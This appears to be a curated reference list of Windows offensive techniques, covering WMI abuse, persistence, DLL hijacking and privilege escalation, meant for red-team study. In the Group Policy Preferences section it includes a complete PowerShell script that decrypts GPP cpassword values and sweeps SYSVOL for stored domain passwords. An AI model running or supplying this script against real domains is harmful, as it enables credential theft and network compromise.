Abusing Windows Management Instrumentation (WMI) - Matthew Graeber(BH USA 2015)
- Imagine a technology that is built into every Windows operating system going back to Windows 95, runs as System, executes arbitrary code, persists across reboots, and does not drop a single file to disk. Such a thing does exist and it's called Windows Management Instrumentation (WMI). With increased scrutiny from anti-virus and 'next-gen' host endpoints, advanced red teams and attackers already know that the introduction of binaries into a high-security environment is subject to increased scrutiny. WMI enables an attacker practicing a minimalist methodology to blend into their target environment without dropping a single utility to disk. WMI is also unlike other persistence techniques in that rather than executing a payload at a predetermined time, WMI conditionally executes code asynchronously in response to operating system events. This talk will introduce WMI and demonstrate its offensive uses. We will cover what WMI is, how attackers are currently using it in the wild, how to build a full-featured backdoor, and how to detect and prevent these attacks from occurring.
- Tools
-
Windows Remote Management(WinRM)
-
Tools
-
CSharpWinRM
- CsharpWinRM is a .NET 4.0 implementation of WinRM using the WinRM C++ API. This project takes in credentials and a command, then executes it on the remote host using Win32_Process.
-
Windows Trouble Shooting Packs
-
101
-
Windows Troubleshooting Platform - docs.ms
- Windows Troubleshooting Platform (WTP) provides ISVs, OEMs, and administrators the ability to write troubleshooting packs that are used to discover and resolve issues found on the computer. Previously, troubleshooting software and hardware issues was a manual process; however, using WTP you can automate the process of fixing the most common detectable issues that the user might encounter using your software or hardware.
-
Built-in Troubleshooting Packs - docs.ms
- Windows 7 includes built-in troubleshooting packs to deal with common problems such as problems that are related to printers, displays, sound, networking, system performance, and hardware compatibility. Microsoft designed these troubleshooting packs to correlate to the top ten categories of Microsoft support calls.
- Windows Update Troubleshooter for Windows 10
-
TroubleshootingPack(PowerShell) - docs.ms
- This reference provides cmdlet descriptions and syntax for all Troubleshooting Pack cmdlets. It lists the cmdlets in alphabetical order based on the verb at the beginning of the cmdlet.
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
-
Payloads
- Articles/Blogposts/Writeups
-
Papers
-
Post-Exploitation on Windows using ActiveX Controls
- When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound filters that may be in place on the target machine's network. Bypassing these filters involves creating a post-exploitation payload that is capable of masquerading as normal user traffic from within the context of a trusted process. One method of accomplishing this is to create a payload that enables ActiveX controls by modifying Internet Explorer's zone restrictions. With ActiveX controls enabled, the payload can then launch a hidden instance of Internet Explorer that is pointed at a URL with an embedded ActiveX control. The end result is the ability for an attacker to run custom code in the form of a DLL on a target machine by using a trusted process that uses one or more trusted communication protocols, such as HTTP or DNS.
-
Tools
-
SirepRAT
- Remote Command Execution as SYSTEM on Windows IoT Core; the method exploits the Sirep Test Service that's built in and running on the official images offered at Microsoft's site. This service is the client part of the HLK setup one may build in order to perform driver/hardware tests on the IoT device. It serves the Sirep/WPCon/TShell protocol. We broke down the Sirep/WPCon protocol and demonstrated how this protocol exposes a remote command interface for attackers, which includes RAT abilities such as get/put arbitrary files on arbitrary locations and obtain system information. Based on the findings we have extracted from this research about the service and protocol, we built a simple python tool that allows exploiting them using the different supported commands. We called it SirepRAT. It features an easy and intuitive user interface for sending commands to a Windows IoT Core target. It works on any cable-connected device running Windows IoT Core with an official Microsoft image.
- Whitepaper
- Slides
-
Persistence
- 101
- Tactics
-
Talks/Presentations/Videos
-
Evading Autoruns - Kyle Hanslovan, Chris Bisnet(Derbycon2017)
- When it comes to offense, maintaining access to your endpoints is key. For defenders, it's equally important to discover these footholds within your network. During this talk, Kyle and Chris will expose several semi-public and private techniques used to evade the most common persistence enumeration tools. Their techniques will explore ways to re-invent the run key, unconventionally abuse search order, and exploit trusted applications. To complement their technical explanations, each bypass will include a live demo and recommendations for detection.
- Materials
- Here to stay: Gaining persistency by Abusing Advanced Authentication Mechanisms - Marina Simakov, Igal Gofman
- Tools
-
Account Manipulation
- Additional Azure Service Principal Credentials
- Exchange Email Delegate Permissions
- Add Office 365 Global Administrator Role
-
RID Hijack
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
RID Hijacking: Maintaining Access on Windows Machines - Sebastián Castro(Derbycon2018)
- Slides
- The art of persistence is (and will be...) a matter of concern when successful exploitation is achieved. Sometimes it is pretty tricky to maintain access on certain environments, especially when it is not possible to execute common vectors like creating or adding users to privileged groups, dumping credentials or hashes, deploying a persistent shell, or anything that could trigger an alert on the victim. This statement ratifies why it's necessary to use discrete and stealthy techniques to keep an open door right after obtaining high privilege access on the target. What could be more convenient than only using OS resources in order to persist an access? This presentation will provide a new post-exploitation hook applicable to all Windows versions called RID Hijacking, which allows setting desired privileges to an existent account in a stealthy manner by modifying some security attributes. To show its effectiveness, the attack will be demonstrated by using a module which was recently added by Rapid7 to their Metasploit Framework, and developed by the security researcher Sebastián Castro.
-
Tools
-
RID Hijacking: Maintaining Access on Windows Machines
- The RID Hijacking hook, applicable to all Windows versions, allows setting desired privileges to an existent account in a stealthy manner by modifying some security attributes of a user. By only using OS resources, it is possible to replace the RID of a user right before the primary access token is created, allowing one to spoof the privileges of the hijacked RID owner.
- SSH Authorized Keys
-
Active Directory Specific
-
Articles/Blogposts/Writeups
- Sneaky Active Directory Persistence Tricks - adsecurity.org
- Shadow Admins – The Stealthy Accounts That You Should Fear The Most - Asaf Hect
- Thousand ways to backdoor a Windows domain (forest)
-
Remote Hash Extraction On Demand Via Host Security Descriptor Modification - Will Schroeder (harmj0y)
- Tl;dr if you gain “administrative” access to a remote machine, you can modify a few host security descriptors and have a security principal/trustee of your choice generate Silver Tickets indefinitely, as well as remotely retrieve local hashes and domain cached credentials.
-
Talks/Presentations/Videos
-
Obtaining and Detecting Domain Persistence - Grant Bugher(DEF CON 23)
- When a Windows domain is compromised, an attacker has several options to create backdoors, obscure his tracks, and make his access difficult to detect and remove. In this talk, I discuss ways that an attacker who has obtained domain administrator privileges can extend, persist, and maintain control, as well as how a forensic examiner or incident responder could detect these activities and root out an attacker.
-
Obtaining and Detecting Domain Persistence - Grant Bugher(DEF CON 23)
- Tools
- Directory Services Restore Mode
-
Golden(Silver) Ticket
- Golden Ticket
- Kerberos Golden Tickets are Now More Golden
- Silver & Golden Tickets - hackndo
- Mimikatz 2.0 - Golden Ticket Walkthrough - Ben Lincoln (https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html)
- Security Support Provider
- SeEnableDelegationPrivilege
- SID History
-
Alternate Data Streams
-
Articles/Blogposts/Writeups
- Stealth Alternate Data Streams and Other ADS Weirdness - @mattifestation(2011)
- Putting data in Alternate data streams and how to execute it - oddvar.moe
- Kurt Seifried Security Advisory 003 (KSSA-003)
- NTFS Alternate Data Streams for pentesters (part 1)
- Using Alternate Data Streams to Persist on a Compromised Machine
- Using Alternate Data Streams to Persist on a Compromised Machine - enigma0x3
- NTFS Alternate Data Streams - darknessgate.com
- Talks & Presentations
-
Tools
-
Exe_ADS_Methods.txt - api0cradle
- Execute from Alternate Streams
-
Get-ADS
- Powershell script to search for alternate data streams
-
Evading Autoruns
- When it comes to offense, maintaining access to your endpoints is key. For defenders, it's equally important to discover these footholds within your network. During this talk, Kyle and Chris will expose several semi-public and private techniques used to evade the most common persistence enumeration tools. Their techniques will explore ways to re-invent the run key, unconventionally abuse search order, and exploit trusted applications. To complement their technical explanations, each bypass will include a live demo and recommendations for detection.
- Talk
-
Alternate-Data-Streams with PowerShell
- I literally stumbled upon this whilst reading up on the parameters for the Get-Content and Set-Content cmdlets for another piece of research. The parameter that got my interest is -Stream which allows the user the ability to read and write NTFS alternate data streams. If we create a file with the following commands: `$file = "$env:TEMP\test.txt"; Set-Content -Path $file -Value 'Alternate Data Stream Test File'`. To read the file content, we use the following: `Get-Content -Path $file`, which will return: `Alternate Data Stream Test File`
-
Get-ADS
- Powershell script to search for alternate data streams. This script searches recursively through a specified file system for alternate data streams (ADS). The script can search local and UNC paths specified by the $path parameter. All readable files will have the stream attribute inspected, ignoring the default DATA and FAVICON (image file on URL files) streams. The script uses Boe Prox's amazing Get-RunspaceData function and other code to multithread the search. The default number of threads is the number of logical cores plus one. This can be adjusted by specifying the $threads parameter. Use with caution as runspaces can easily chomp resources (CPU and RAM). Once the number of file system objects (files and folders) is determined, they are split into equal groups of objects divided by the number of threads. Then each thread has a subset of the total objects to inspect for ADS.
- AMSI Provider
-
APPX/UWP
-
Persistence using Universal Windows Platform apps (APPX) - oddvarmoe
- Persistence can be achieved with Appx/UWP apps using the debugger options. This technique will not be visible by Autoruns.
-
BITS Jobs
-
Articles/Blogposts/Writeups
- Background Intelligent Transfer Service - docs.ms
-
BITSAdmin tool - docs.ms
- BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.
- Temporal Persistence with bitsadmin and schtasks
- Talks/Presentations/Videos
- Tools
-
Boot or Logon Autostart Execution
- Windows Startup Application Database
- Windows Program Automatic Startup Locations(2004) BleepingComputer
- Authentication Package
- Kernel Modules and Extensions
- LSASS Driver
- GPO
- Port Monitors
- Plist Modification
- Re-opened Applications
- Registry Run Keys / Startup Folder
- Security Support Provider
- Shortcut Modification
- Time Providers
- Winlogon Helper DLL
-
Boot or Logon Initialization Scripts
- Browser Extensions
- Logon Script (Mac)
- Logon Script (Windows)
- Network Logon Script
- Rc.common
- Startup Items
- Compromise Client Software Binary
-
Create Account
- Local Account
- Domain Account
- Cloud Account
-
Create or Modify System Process
- Launch Agent
- Systemd Service
- Windows Service
- Launch Daemon
-
Drivers
-
Windows Firewall Hook Enumeration
- We’re going to look in detail at Microsoft Windows Firewall Hook drivers from Windows 2000, XP and 2003. This functionality was leveraged by the Derusbi family of malicious code to implement port-knocking like functionality. We’re going to discuss the problem we faced, the required reverse engineering to understand how these hooks could be identified and finally how the enumeration tool was developed.
-
Event Triggered Execution
- .bash_profile and .bashrc
- Accessibility Features
- AppCert DLLs
-
AppInit DLLs
-
Articles/Blogposts/Writeups
- AppInit_DLLs in Windows 7 and Windows Server 2008 R2 - docs.ms
-
AppInit DLLs and Secure Boot - docs.ms
- Starting in Windows 8, the AppInit_DLLs infrastructure is disabled when secure boot is enabled.
- Alternative psexec: no wmi, services or mof needed - Diablohorn
-
Application Shimming
-
Articles/Blogposts/Writeups
- Windows Persistence using Application Shimming - Kavish Tyagi(2020)
- Post Exploitation Persistence With Application Shims (Intro)
- Shimming for Post Exploitation(blog)
- Demystifying Shims – or – Using the App Compat Toolkit to make your old stuff work with your new stuff
- Shim Database Talks
- Using Application Compatibility Shims
- Persistence via Shims - liberty-shell
-
Tools
-
Windows 0wn3d By Default - Mark Baggett(Derbycon2013)
- Description: “In this talk we will discuss API Hooking, Process Execution Redirection, Hiding Registry keys and hiding directories on the hard drive. We must be talking about rootkits, right? Well yes, but not in the way you think. The Windows family of operating systems has all of these capabilities built right in! Using nothing but tools and techniques distributed and documented by Microsoft we can implement all of these rootkit functions. During this exciting talk I will present new attacks against the Windows operating system that provide rootkit like functionality with built-in OS tools. In session, we’ll demonstrate how to leverage the Microsoft Application Compatibility Toolkit to help hide an attacker’s presence on your system. The Application Compatibility Toolkit allows you to create application shims that intercept and redirect calls from applications to the operating system. This native rootkit like capability is intended to make the Windows operating system compatible with very old or poorly written applications. Do DEP, ASLR, UAC, and Windows Resource Protection, File system ACLS and other modern OS security measures get in your way? No problem. Turn them off! Do you want to hide files and registry keys from the user? The Application Compatibility toolkit allows you to create a virtual world for any application and hide resources from view. If someone inspects the registry with regedit they will see exactly what the attacker wants them to see and not what the OS sees when it launches programs. Did they patch your target so your exploit doesn’t work? Guess what, making applications backwards compatible is what this tool is intended to do. Make your favorite applications “old exploit compatible” ensuring you can re-exploit the target with this awesome untapped resource. Everything you need to subvert windows applications is built right into the windows kernel. Come learn how to use the application compatibility toolkit to tap this great resource.”
-
Change Default File Association
- Registering an Application to a URI Scheme - docs.ms
-
Exploiting custom protocol handlers in Windows - Andrey Polkovnychenko
- In this article we would like to present the mechanism for custom protocol handling in Windows, and how it can be exploited using a simple command injection vulnerability.
-
Component Object Model Hijacking
- COM Object hijacking: the discreet way of persistence
- Userland Persistence with Scheduled Tasks and COM Handler Hijacking
- How To Hunt: Detecting Persistence & Evasion With The COM - Blake Strom
- Persistence: “the continued or prolonged existence of something”: Part 2 – COM Hijacking - MDSec
- Use COM Object hijacking to maintain persistence——Hijack CAccPropServicesClass and MMDeviceEnumerator - 3gstudent
- Use COM Object hijacking to maintain persistence——Hijack explorer.exe - 3gstudent
-
Activation Contexts — A Love Story - Philip Tsukerman(2019)
- TL;DR — Windows loads a version of the Microsoft.Windows.SystemCompatible assembly manifest into every process. Tampering with it lets you inject DLL side-loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise.
- Emond
- Event Log
- Image File Execution Options Injection
- LC_LOAD_DYLIB Addition
- Netsh Helper DLL
-
PowerShell-related
-
Articles/Blogposts/Writeups
-
Using and Abusing Aliases with PowerShell - notoriousrebel.space
- Shimming Aliases with PowerShell
-
Tools
-
Remapper
- PowerShell script that will shim aliases throughout PowerShell sessions through the use of PowerShell profiles.
-
p0shkiller(2016)
- Proof of Concept exploit to bypass Microsoft's latest AntiMalware Scan Interface technology within PowerShell 5 on Windows 10. With this exploit/patch applied, you can take control over PowerShell's program flow by using DLL Hijacking and UAC Bypass techniques. Every time PowerShell is started, a local admin named BadAss with password FacePalm01 will be added to the system (when run by a non-elevated administrator account) and a reverse (SYSTEM) https meterpreter session (default 192.168.1.120) will be started every hour using a scheduled task.
- Screensaver
- Trap
- Windows Management Instrumentation Event Subscription
- External Remote Services
- Filesystem
-
Hijack Execution Flow
- COR_PROFILER
- DLL Search Order Hijacking
- DLL Side-Loading
- Dylib Hijacking
- Executable Installer File Permissions Weakness
- Implant Container Image
- LD_PRELOAD
- Path Interception by PATH Environment Variable
- Path Interception by Search Order Hijacking
- Path Interception by Unquoted Path
- Services File Permissions Weakness
- Services Registry Permissions Weakness
-
MS Distributed Transaction Coordinator Service
-
Articles/Blogposts/Writeups
- Distributed Transaction Coordinator - docs.ms
- The Microsoft Distributed Transaction Coordinator service must run under the NT AUTHORITY\NetworkService Windows account - support.ms
- Shadow Force Uses DLL Hijacking, Targets South Korean Company - Dove Chiu(2015)
- Use msdtc to maintain persistence - 3gstudent
- LAPS
-
Library Files
-
101
-
Windows libraries - docs.ms
- Libraries are virtual containers for users’ content. A library can contain files and folders stored on the local computer or in a remote storage location. In Windows Explorer, users interact with libraries in ways similar to how they would interact with other folders. Libraries are built upon the legacy known folders (such as My Documents, My Pictures, and My Music) that users are familiar with, and these known folders are automatically included in the default libraries and set as the default save location.
- Articles/Blogposts/Writeups
-
.NET
-
Articles/Blogposts/Writeups
-
Common Language Runtime Hook for Persistence - Paul Laine
- This blog post explains how it is possible to execute arbitrary code and maintain access to a Microsoft Windows system by leveraging the Common Language Runtime application domain manager.
-
CLR-Persistence
- Use CLR to inject all the .NET apps
- Using CLR to maintain Persistence
- SharPersist: Windows Persistence Toolkit in C# - Brett Hawkins
-
Tools
-
SharPersist
- Windows persistence toolkit written in C#
- AppDomain
- Netsh Helper DLL
-
Office Applications
- Articles/Blogposts/Writeups
- Add-ins
- Extensibility Features
-
Office Template Macros
-
One Template To Rule 'Em All - Kostas Lintovois
- Introduction of wePWNize
- Outlook Forms
- Outlook Rules
- Outlook Home Page
- Office Test
-
Password Filter DLL
-
101
-
Password Filters - docs.ms
- Password filters provide a way for you to implement password policy and change notification.
- AD Password Filters - ldapwiki
-
Installing and Registering a Password Filter DLL - docs.ms
- You can use the Windows password filter to filter domain or local account passwords. To use the password filter for domain accounts, install and register the DLL on each domain controller in the domain.
- Installing and Registering a Password Filter DLL - msdn.ms
-
PSAM_PASSWORD_NOTIFICATION_ROUTINE callback function - docs.ms
- The PasswordChangeNotify function is implemented by a password filter DLL. It notifies the DLL that a password was changed.
-
Articles/Blogposts/Writeups
- Capture password change at active directory controller - StackOverflow(2013)
- How a Windows Password Filters Works - NFront(2014)
- Stealing passwords every time they change - carnal0wnage(2013)
- Intercepting Password Changes With Function Hooking - clymb3r(2013)
- T1174: Password Filter - @spottheplanet
-
Throwing it out the Windows: Exfiltrating Active Directory credentials through DNS - Leanne Dutil
- This post will detail the password filter implant project we developed recently. Our password filter is used to exfiltrate Active Directory credentials through DNS. This text will discuss the technicalities of the project as well as my personal experience developing it.
- Dump-Clear-Text-Password-after-KB2871997-installed - 3gstudent
- Domain Penetration-Hook PasswordChangeNotify – Three Good Students
- Talks/Presentations/Videos
-
Tools
-
DLLPasswordFilterImplant
- DLLPasswordFilterImplant is a custom password filter DLL that allows the capture of a user's credentials. Each password change event on a domain will trigger the registered DLL in order to exfiltrate the username and new password value prior to successfully changing it in the Active Directory (AD).
-
OpenPasswordFilter
- OpenPasswordFilter is an open source custom password filter DLL and userspace service to better protect / control Active Directory domain passwords.
-
PasswordStealing
- Password stealing DLL I have written about 1999, some time before Active Directory was announced. And of course it still works. First, it was written in 32-bit Delphi (pardon my language) and when it stopped working as everything changed into 64-bit - in (so much simpler when it comes to Win32 API) C, as I did not have 64-bit Delphi. The original implementation was a bit more complex, including broadcasting the changed password over the network etc. but now it works as a demonstration of an idea, so let's keep it as simple as possible. It works everywhere - on local machines for local accounts and on DCs for domain accounts.
-
Pre-OS Boot
- System Firmware
- Component Firmware
- Bootkit
-
Registry
- Windows Registry Attacks: Knowledge Is the Best Defense
- Windows Registry Persistence, Part 1: Introduction, Attack Phases and Windows Services
- Windows Registry Persistence, Part 2: The Run Keys and Search-Order
- List of autorun keys / malware persistence Windows registry entries
- How to Evade Detection: Hiding in the Registry - David Lu
- Persistence – Registry Run Keys - NetbiosX
-
InvisiblePersistence
- Persisting in the Windows registry "invisibly". Whitepaper and POC
-
Scheduled Task/Job
-
At (Windows)
-
Scheduled Task
-
Sc
- Communicates with the Service Controller and installed services. The SC.exe program provides capabilities similar to those provided in Services in the Control Panel.
- schtasks
-
Script Task
- Persistence Via MSSQL
-
At (Linux)
-
Launchd
-
Cron
-
ScreenSaver
-
Services
- Stealthier persistence using new services purposely vulnerable to path interception - Christophe Tafani-Dereeper
- Persistence – New Service - NetbiosX
-
Server Software Component
- IIS
- MS-SQL Server
- SQL Stored Procedures
- Transport Agent
- Web Shell
- Third-Party Programs
-
Traffic Signaling
- Port Knocking
-
UEFI
- MIDNIGHTTRAIN
-
Blogpost
- Covert Stage-3 Persistence Framework utilizing NVRAM variables
-
Valid Accounts
- Default Accounts
- Domain Accounts
- Local Accounts
- Cloud Accounts
- VisualStudio
-
WaitFor
- waitfor - docs.ms
-
Persistence – WaitFor - NetbiosX(2020)
- "Waitfor is a Microsoft binary which is typically used to synchronize computers across a network by sending signals. This communication mechanism can be used in a red team operation in order to download and execute arbitrary code and for persistence. The binary is stored in the C:\Windows\System32 folder, which means that local administrator privileges are required to perform this activity, and both hosts (sender and receiver) need to be on the same network segment."
- WMI
- WPAD
-
Unsorted
- Quiet in the Windows: Dropping Network Connections - Eviatar Gerzi
-
Tools
- Invisible Persistence
-
DropNet
- A tool that can be used to close network connections automatically with given parameters
-
Miscellaneous
-
backdoorme
- Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time. Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access - only keep that access once it has been gained.
-
Privilege Escalation
-
101
- Windows Privilege Escalation Fundamentals
- Windows Privilege Escalation Methods for Pentesters
- Common Windows Privilege Escalation Vectors
- Windows Privilege Escalation Cheat Sheet/Tricks
- Windows / Linux Local Privilege Escalation Workshop
- Hunting for Privilege Escalation in Windows Environment - Heirhabarov
-
Elevating your Windows Privileges Like a Boss! - Jake Williams(WWHF2019)
- Local privilege escalation on Windows is becoming increasingly difficult. Gone are the days when you could just easily exploit the Windows kernel. Multiple controls (KASLR, DEP, SMEP, etc.) have made kernel mode exploitation of the bugs that are discovered much more difficult. In this talk, we'll discuss multiple opportunities for privilege escalation including using COM objects, DLL side loading, and various privileges assigned to user accounts. Bring a Windows 10 VM. We'll have instructions available for recreating the scenarios demonstrated in the talk.
-
General
- Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw
- Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read - James Forshaw
-
PrivescCheck
- This script aims to enumerate common Windows security misconfigurations which can be leveraged for privilege escalation and gather various information which might be useful for exploitation and/or post-exploitation.
-
Specific Techniques
- Always Install Elevated
-
DLL Stuff
- Creating a Windows DLL with Visual Basic
- Calling DLL Functions from Visual Basic Applications - msdn
-
DLL Hijacking/Plant
-
101
- Dynamic-Link Library Search Order - docs.ms
- Dynamic-Link Library Hijacking
- Crash Course in DLL Hijacking
- VB.NET Tutorial - Create a DLL / Class Library
-
Exploiting DLL Hijacking by DLL Proxying Super Easily
- This is a tutorial about exploiting DLL Hijack vulnerability without crashing the application. The method used is called DLL Proxying.
-
Hijacking DLLs in Windows - Wietze(2020)
- DLL Hijacking is a popular technique for executing malicious payloads. This post lists nearly 300 executables vulnerable to relative path DLL Hijacking on Windows 10 (1909), and shows how with a few lines of VBScript some of the DLL hijacks can be executed with elevated privileges, bypassing UAC.
-
dll-hijack-by-proxying
- This is a tutorial about exploiting DLL Hijack vulnerability without crashing the application. The method used is called DLL Proxying.
-
Articles/Blogposts/Writeups
- Adaptive DLL Hijacking - Nick Landers
- DLL Hijacking via URL files - InsertScript
- DLL Hijacking - pentestlab.blog(2017)
- Understanding how DLL Hijacking works - Astr0baby(2018)
- DLL Hijacking - libertyshell.com(2019)
- Lateral Movement — SCM and DLL Hijacking Primer - Dwight Hohnstein(2019)
- Automating DLL Hijack Discovery - Justin Bui(2020)
- UAC bypass through Trusted Folder abuse - Jean Maes(2020)
-
Windows 10 - Task Scheduler service - Privilege Escalation/Persistence through DLL planting - remoteawesomethoughts.blogspot
- I was recently busy doing some reverse on an antivirus solution. During this review, I figured out the Windows 10 Task Scheduler service was looking for a missing DLL exposing it to DLL hijacking/planting. It opens for persistence and privilege escalation in case one can write a rogue DLL in a folder pointed by the PATH environment variable. It can also be used as a UAC bypass.
- Use CLR to bypass UAC - 3gstudent
-
UAC bypass via elevated .NET applications - @clavoillotte(2017)
- TL;DR .NET Framework can be made to load a profiling DLL or a COM component DLL via user-defined environment variables and CLSID registry entries, even when the process is elevated. This behavior can be exploited to bypass UAC in default settings on Windows 7 to 10 (including the latest RS3 builds) by making an auto-elevate .NET process (such as MMC snap-ins) load an arbitrary DLL.
-
.NET Profiler DLL Hijack
- The .NET Framework can be coerced into loading a profiling DLL into any .NET assembly when launched. This is done when a handful of environment variables and registry keys are set. For a full write-up you can view this blog here: https://offsec.provadys.com/UAC-bypass-dotnet.html
-
Tools
-
Siofra
- DLL hijacking vulnerability scanner and PE infector tool
-
DLLSpy
- DLLSpy is a tool that detects DLL hijacking in running processes, services and in their binaries.
-
Robber
- Robber is an open-source tool for finding executables prone to DLL hijacking
-
Koppeling
- This project is a demonstration of advanced DLL hijack techniques. It was released in conjunction with the "Adaptive DLL Hijacking" blog post. I recommend you start there to contextualize this code.
- TrustJack
- HijackHunter
-
101
-
DLL Tools
-
rattler
- Rattler is a tool that automates the identification of DLL's which can be used for DLL preloading attacks.
-
injectAllTheThings
- Single Visual Studio project implementing multiple DLL injection techniques (seven different techniques) that work for both 32-bit and 64-bit. Each technique has its own source code file to make it easy to read and understand.
-
Pazuzu
- Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.
-
Bleak
- A Windows native DLL injection library written in C# that supports several methods of injection.
-
Exploits/Missing Patches
- Windows Kernel Exploits - NetbiosX
- kernel-exploits - SecWiki
- MS17-010 (Eternal Blue)
- CVE-2018-8140
- CVE-2019-0841
- CVE-2019-1064
- CVE-2019-1069
- CVE-2019-1082
- CVE-2020-0618
- CVE-2020-0787
-
CVE-2020-0796
-
CVE-2020-0796
- Windows SMBv3 LPE Exploit
- CVE-2020-0796 Windows SMBv3 LPE Exploit POC Analysis - Sung Lin(2020)
- Exploiting SMBGhost (CVE-2020-0796) for a Local Privilege Escalation: Writeup + POC - Zecops(2020)
- CVE-2020-0796 | Windows SMBv3 Client/Server Remote Code Execution Vulnerability - portal.msrc
- I'm SMBGhost, daba dee daba da - Lucas Georges(2020)
- CVE-2020-0796 Memory Corruption Vulnerability in Windows 10 SMB Server - Yije Wang(2020)
- SMBGhost – Analysis of CVE-2020-0796 - Eoin Carroll, Philippe Laulheret, Kevin McGrath, Steve Povolny(2020)
-
- Technical analysis of the Microsoft SMBv3 client/server remote code execution vulnerability (CVE-2020-0796) - blogs.360.cn (https://blogs.360.cn/post/CVE-2020-0796.html)
- Vulnerability Reproduction: CVE-2020-0796 POC - Zecops
-
CVE-2020-1362
-
Exploiting an Elevation of Privilege bug in Windows 10 (CVE-2020-1362)
- writeup of CVE-2020-1362
-
Miscellaneous
-
CVE-2019-1405 and CVE-2019-1322 – Elevation to SYSTEM via the UPnP Device Host Service and the Update Orchestrator Service - Phillip Langlois and Edward Torkington
- This blog post discusses two vulnerabilities discovered by NCC Group consultants during research undertaken on privilege elevation via COM local services. The first of these vulnerabilities (CVE-2019-1405) is a logic error in a COM service and allows local unprivileged users to execute arbitrary commands as a LOCAL SERVICE user. The second vulnerability (CVE-2019-1322) is a simple service misconfiguration that allows any user in the local SERVICE group to reconfigure a service that executes as SYSTEM (this vulnerability was independently also discovered by other researchers). When combined, these vulnerabilities allow an unprivileged local user to execute arbitrary commands as the SYSTEM user on a default installation of Windows 10.
- Thanksgiving Treat: Easy-As-Pie Windows 7 Secure Desktop Escalation Of Privilege - Simon Zuckerbraun
- Docker Desktop for Windows PrivEsc (CVE-2020-11492) - Ceri Coburn(2020)
- Windows Telemetry service elevation of privilege - secret.club(2020)
- CVE-2016-5237: Valve Steam 3.42.16.13 Local Privilege Escalation
-
Fax/Printer/Network Service
- Articles/Blogposts/Writeups
-
Tools
-
faxhell ("Fax Shell")
- A Proof-of-Concept bind shell using the Fax service and a DLL hijack based on Ualapi.dll.
- RpcSsImpersonator
-
Group Policy (Preferences)
- Get-GPPermission - docs.ms
- Exploiting Windows 2008 Group Policy Preferences
- Decrypting Windows 2008 GPP user passwords using Gpprefdecrypt.py
- Group Policy Preferences and Getting Your Domain 0wned - Carnal0wnage
- Compromise Networks Through Group Policy Preferences - securestate.com(archive.org)
- Group Policy Preferences - NetbiosX
- Credential Dumping: Group Policy Preferences (GPP) - Yashika Dhir(2020)
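The posts above all come down to one decryption. As an added example, not code from Gpprefdecrypt.py or any of the linked posts, this PowerShell implements it and sweeps SYSVOL for the six preference files that can carry a cpassword attribute. The SYSVOL path layout and the use of USERDNSDOMAIN for the domain name are assumptions about a standard domain-joined host; the AES key itself is the one Microsoft published in the GPP documentation.

```powershell
# Added example: decrypt Group Policy Preferences "cpassword" values. The AES-256
# key is the one Microsoft published in the GPP documentation (MS-GPPREF), which
# is why every cpassword in SYSVOL is readable by any domain user; MS14-025 only
# stopped the UI from writing new ones, it did not clean up existing XML files.

function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    $key = [byte[]]@(
        0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
        0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b
    )
    # GPP writes base64 without '=' padding; restore it before decoding.
    $padded = $Cpassword + ('=' * ((4 - ($Cpassword.Length % 4)) % 4))
    $cipher = [Convert]::FromBase64String($padded)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key     = $key
        $aes.IV      = New-Object byte[] 16              # all-zero IV, per the spec
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    } finally { $aes.Dispose() }
    # The plaintext is UTF-16LE, like every string GPP stores.
    [System.Text.Encoding]::Unicode.GetString($plain)
}

function Find-GppPassword {
    param([string]$Domain = $env:USERDNSDOMAIN)
    # The six preference types that can carry a cpassword attribute.
    $files = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Drives.xml', 'Printers.xml'
    Get-ChildItem -Path "\\$Domain\SYSVOL\$Domain\Policies" -Recurse -Include $files -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_.FullName
            [xml]$doc = Get-Content -LiteralPath $file -Raw
            foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
                $cp = $node.GetAttribute('cpassword')
                if (-not $cp) { continue }               # cpassword="" means no password was set
                # The account attribute differs per preference type; take the first one present.
                $account = foreach ($attr in 'userName', 'accountName', 'runAs') {
                    $v = $node.GetAttribute($attr); if ($v) { $v; break }
                }
                [pscustomobject]@{
                    File     = $file
                    Account  = $account
                    Changed  = $node.ParentNode.GetAttribute('changed')
                    Password = ConvertFrom-GppCpassword -Cpassword $cp
                }
            }
        }
}

# Usage: decrypt one value lifted from a Groups.xml (the cpassword string below is
# the sample value circulated in public GPP writeups), or sweep the domain's SYSVOL.
ConvertFrom-GppCpassword -Cpassword 'j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw'
# Find-GppPassword | Format-Table -AutoSize
```

The sweep needs nothing beyond domain-user read access to SYSVOL, which is the whole point of the linked posts: the remediation is to delete the XML files that still carry a cpassword, not just to apply MS14-025.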
- Intel SYSRET
-
LAPS Misconfiguration
-
Taking over Windows Workstations thanks to LAPS and PXE - Rémi ESCOURROU
